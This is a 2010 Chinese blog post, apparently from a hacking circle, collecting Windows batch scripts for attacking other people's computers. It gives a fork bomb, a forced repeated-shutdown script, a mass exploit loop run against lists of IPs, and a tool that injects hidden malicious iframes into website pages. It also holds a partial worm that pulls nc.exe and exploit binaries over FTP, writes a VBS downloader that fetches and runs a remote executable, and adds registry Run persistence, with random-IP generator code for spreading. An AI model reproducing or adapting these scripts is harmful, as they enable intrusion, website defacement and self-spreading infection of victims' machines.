标题:各种入侵批处理 出处:大漠荒颜 时间:Fri, 02 Jul 2010 17:03:11 +0000 作者:北纬36度 地址:http://www.736202.com/read.php/288.htm 内容: 第一个:让别人内存OVER(逼他重启) @echo off start cmd %0 就这3行了 第二个:让对方重启指定次数(害人专用) @echo off if not exist c:\1.txt echo. >c:\1.txt & goto err1 if not exist c:\2.txt echo. >c:\2.txt & goto err1 if not exist c:\3.txt echo. >c:\3.txt & goto err1 if not exist c:\4.txt echo. >c:\4.txt & goto err1 if not exist c:\5.txt echo. >c:\5.txt & goto err1 goto err2 :err1 shutdown -s -t 0 :err2 上面可以让对方电脑重启5次后不在重启 第三个:自动踢人(3389肉机保护自己专用) @echo off logoff 1 del log.bat logoff后面的1改成自己登陆的ID号,用query user查看 第四个: 批量自动溢出 @for /f %%i in (result.txt) do 42 %%i 58.44.89.158 521 先自己用NC监听端口,多开几个,然后指行,就自动溢出了 第五个:自动挂马改主页 @echo off cls rem 直接打批处理名字就有帮助 title 批量挂马,改首页(伤脑筋 qq:447228437). color A set pan=%1 set ye=%2 set dai=%3 if "%pan%"=="" goto e1 if "%ye%"=="" goto e1 if "%dai%"=="" goto e1 if "%dai%"=="htm.txt" goto u1 forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE echo ^http://%dai%" width="0" height="0" frameborder="0"^> >>@path" echo. echo 代码全部插入完毕!!!! echo. pause goto e1 :u1 echo 您现在的操作将使%pan%盘下,全部名为%ye%的内容变为您要更改的内容. echo 这将是非常危险的,您真的要这样做? 回车却认,Ctrl+c取消操作. pause forfiles /p %pan% /m %ye% /s /c "cmd /c if @isdir==FALSE copy %1\htm.txt @path /y" echo. echo 首页全部更改完必!!!!如果您发现没有替换成功,请将%ye%文件只读属性去掉. echo. pause :e1 echo. echo 本批处理只适用于2003系统,其他系统要使用,请将forfiles.exe拷贝至系统盘system32目录下 echo 用法:snj ^ ^文件名^> ^ echo 例子:snj d:\ index.asp www.muma.com/mm.htm echo 批处理将自动添加^标记 echo. echo 如果您要更改全部网站的首页!请在批处理文件所在目录下,新建一个名为htm.txt的文本文件. echo 然后将要更改的代码加COPY到里面保存.然后将命令的^项输入为htm.txt即可. echo 例子:snj d:\ index.asp htm.txt echo. echo 为了能准确无误执行批处理请最好先把记事本的"自动换行功能去掉",让命令保持在一行才能正确执行. echo. echo 使用此批处理造成一切后果本人概不负责,请大家谨慎使用! echo. 第六个:利用批处理编写利用系统漏洞传播的蠕虫病毒 本来想写完后在做教程,要去学校了,所以先把思路告诉大家,大家可以先自己写写,我有时间写完发到群里. 这些是我未完成的批处理,大家可以在此基础上按照我下面说的思路继续写完 del c:\42.exe del c:\nc.exe del c:\ip.exe echo dim wsh > %systemroot%\help\test.vbs echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 > %systemroot%\help\test.vbs echo dim wsh > %systemroot%\help\test2.vbs echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test2.vbs echo wsh.run "cmd /c start %systemroot%\help\good.bat",0 >> %systemroot%\help\test2.vbs echo open 10.0.0.5 > %systemroot%\help\ftp.txt echo open myyes >> %systemroot%\help\ftp.txt echo 1 >> %systemroot%\help\ftp.txt echo binary >> %systemroot%\help\ftp.txt echo get 42.exe c:\42.exe >> %systemroot%\help\ftp.txt echo get nc.exe c:\nc.exe >> %systemroot%\help\ftp.txt echo get ip.exe c:\ip.exe >> %systemroot%\help\ftp.txt echo bye >> %systemroot%\help\ftp.txt echo echo Set xPost = CreateObject("Microsoft.xmlHTTP") ^>1.vbs > %systemroot%\help\or.txt echo echo xPost.Open "GET","http://10.0.0.5/my.exe&quo...,0 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo xPost.Send() ^>^>1.vbs >> %systemroot%\help\or.txt echo echo Set sGet = CreateObject("ADODB.Stream") ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Mode = 3 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Type = 1 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.Write(xPost.responseBody) ^>^>1.vbs >> %systemroot%\help\or.txt echo echo sGet.SaveToFile "d:\my.exe",2 ^>^>1.vbs >> %systemroot%\help\or.txt echo echo 1.vbs ^>^>1.vbs >> %systemroot%\help\or.txt echo echo my.exe ^>^>1.vbs >> %systemroot%\help\or.txt echo windows Registry Editor Version 5.00 > %systemroot%\help\1.reg echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\windows\CurrentVersion\Run] >> %systemroot%\help\1.reg echo "SKYNET Personal FireWall"="F:\\系统安全工具\\FireWall\\PFW.exe" >> %systemroot%\help\1.reg echo "1"="%systemroot%\\help\\test2.vbs" >> %systemroot%\help\1.reg if not exist %systemroot%\help\good.bat copy good.bat %systemroot%\help\good.bat & %systemroot%\help\test2.vbs & del good.bat regedit -s %systemroot%\help\1.reg ftp -s:%systemroot%\help\ftp.txt move c:\nc.exe %systemroot%\help\ /y move c:\42.exe %systemroot%\help\ /y move c:\ip.exe %systemroot%\help\ /y %systemroot%\help\test.vbs rem for /f %%i in (result1.txt) do set a=%%i rem for /f %%j in (result.txt) do 42 %a% %%j 810 准备: 1:找一个反向连接的溢出攻击程序,如ms06040漏洞 2:找呀一个免费FTP空间,最好是送域名的 3:利用你所知道的高级语言编写一个,能生成随机范围IP地址和找到本机IP的工具. 思路: 用for语句对指定文本里的IP进行溢出,然后用if语句判断是否溢出成功, 如果成功开启一个NC监听端口,NC后面带一个 批处理文件,然后执行这个批处理.这样被溢出的机器就又会在他那里运行我门的批处理,从而到自动传播的目的. 把批处理生成的文件集中放到一个目录下,可以%systemroot%系统变量直接放到系统目录下,因为批处理运行后会闪出命令行窗口,我门可以利用VBS脚本来运行我们的批处理,这样就不会有任何窗口出现,脚本如下 echo dim wsh > %systemroot%\help\test.vbs echo set wsh=CreateObject("WScript.Shell") >> %systemroot%\help\test.vbs echo wsh.run "cmd /c %systemroot%\help\nc -v -l -p 810 > %systemroot%\help\test.vbs 生成随机IP工具的VB代码 Private Sub Form_Load() Dim fso As New FileSystemObject Dim a, b, c, d As Integer Dim ph, e As String ph = App.Path & "\" & "ip.txt" Randomize a = Int(253 * Rnd + 1) b = Int(253 * Rnd + 1) c = Int(240 * Rnd + 1) Open ph For Output As #1 For i = c To c + 7 For j = 1 To 254 e = a & "." & b & "." & i & "." & j Print #1, e DoEvents Next j Next i Close #1 Unload Me End Sub Generated by Bo-blog 2.1.1 Release